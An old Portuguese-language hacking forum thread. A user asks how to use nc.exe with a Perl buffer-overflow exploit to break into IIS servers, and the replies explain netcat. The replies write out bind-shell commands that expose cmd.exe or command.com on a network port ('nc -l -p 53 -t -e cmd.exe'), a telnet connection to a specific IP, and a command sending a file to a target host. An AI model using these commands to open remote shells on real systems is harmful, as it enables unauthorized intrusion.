NC.EXE

[..::DarK.AngeL::..]

aí galera alguem sabe como funciona esse programa..???? ele serve pra vc invadir servido IIS com buffer overflow vc só tem q executar o exploit em perl e executar o programa nc.exe... mas tipo assim tem que digitar alguns comandos e eu naum entendo nada.... me deem uma luz !!!!!

valeu...

[^[H,L]aetc]

Bem, pelo que parece, esse nc.exe aí é o netcat pra windows..
Download e informações vc encontra aqui. Bem, o netcat é chamado de "canivete suíço".. vc vai ver pq:
Não sei qual é o esquema nesse caso, mas vc tanto pode acessar um servidor remoto quanto usar o nc como servidor...
nc xxx.xxx.xxx.xxx 23
Acessa a porta 23 (telnet)
nc -l -p 53 -t -e cmd.exe
Esse aí deve ser rodado no computador remoto.. faz com que o nc escute conexões (-l) na porta 53 (-p 53) e execute o cmd.exe, dando um interpretador de  comandos para vc..
O que ele ta fazendo nesse caso é redirecionar a saída e a entrada (stdin e stdout se preferir assim) do cmd.exe para a rede. Vc conecta ao netcat pela porta 53 nesse caso, ele direciona seus comandos para o cmd.exe, que os executa;
a saída que ele te daria se vc estivesse lá, o nc passa pra vc.
E vc pode usar tb para acessar qq porta..

nc host.alvo.dominio 80 < arquivo
Esse exemplo manda o conteudo de arquivo para a porta 80 do servidor alvo.
Bem, vai lá.. leia os manuais, aproveite pra dar uma olhada nas ferramentas forenses, e divirta-se. Hmm. Não faça besteira..

[GuttoSP]

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Citação </td></tr><tr><td id="QUOTE">Não sei qual é o esquema nesse caso, mas vc tanto pode acessar um servidor remoto quanto usar o nc como servidor...
nc xxx.xxx.xxx.xxx 23
Acessa a porta 23 (telnet)
nc -l -p 53 -t -e cmd.exe
Esse aí deve ser rodado no computador remoto.. faz com que o nc escute conexões (-l) na porta 53 (-p 53) e execute o cmd.exe, dando um interpretador de &nbsp;comandos para vc..
O que ele ta fazendo nesse caso é redirecionar a saída e a entrada (stdin e stdout se preferir assim) do cmd.exe para a rede. Vc conecta ao netcat pela porta 53 nesse caso, ele direciona seus comandos para o cmd.exe, que os executa;
a saída que ele te daria se vc estivesse lá, o nc passa pra vc.
E vc pode usar tb para acessar qq porta..[/QUOTE]<span id='postcolor'>
1. O &quot;cmd.exe&quot; é um interpretador de comandos que só é usado remotamente ou ele é um terminal qualquer, assim como o command.com?
2. Eu poderia atuar com o command.com ao invéz dele? Exemplo:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">nc -l -p 53 -t -e command.com[/QUOTE]<span id='postcolor'>

Obrigado pela atenção&#33;
[]&#39;s... LiPSuRFeR
lipsurfer@hotmail.com

[GuttoSP]

Respondendo minhas próprias dúvidas (isso não te comove?):

1. O cmd.exe é um terminal qualquer, assim como o command.com, e os dois podem ser utilizados para administração remota.
2. Sim, se o sistema que utilizo tem a base Win9x (quanto às versões posteriores eu não sei muito bem, pois só utilizei o Win95, Win98 e Win98SE) posso utilizar o command.com ao invés do cmd.exe com a linha de comando:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">nc -l -p 666 -vv -e command.com[/QUOTE]<span id='postcolor'>
Assim a pessoa que quer acessar meus arquivos remotamente vai em &quot;INICIAR&quot;, &quot;EXECUTAR&quot;, e digita:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">telnet 200.154.15.147 666[/QUOTE]<span id='postcolor'>
Assim receberá um terminal idêntico ao command.com, porém remotamente.
Altere a porta 666 pela porta que deseja servir, e IP 200.154.15.147 pelo seu IP. Cuidado com o que fará com isso, pois estará dando permissão root ao usuário que conectar a você.

Obrigado pela atenção&#33;
[]&#39;s... LiPSuRFeR
lipsurfer@hotmail.com

[Simmons]

Ola pessoal

como faço pra fechar uma porta , depois q abri com o netcat???

[GuttoSP]

Basta fechar o NetCat.

Obrigado pela atenção&#33;
[]&#39;s... LiPSuRFeR
lipsurfer@hotmail.com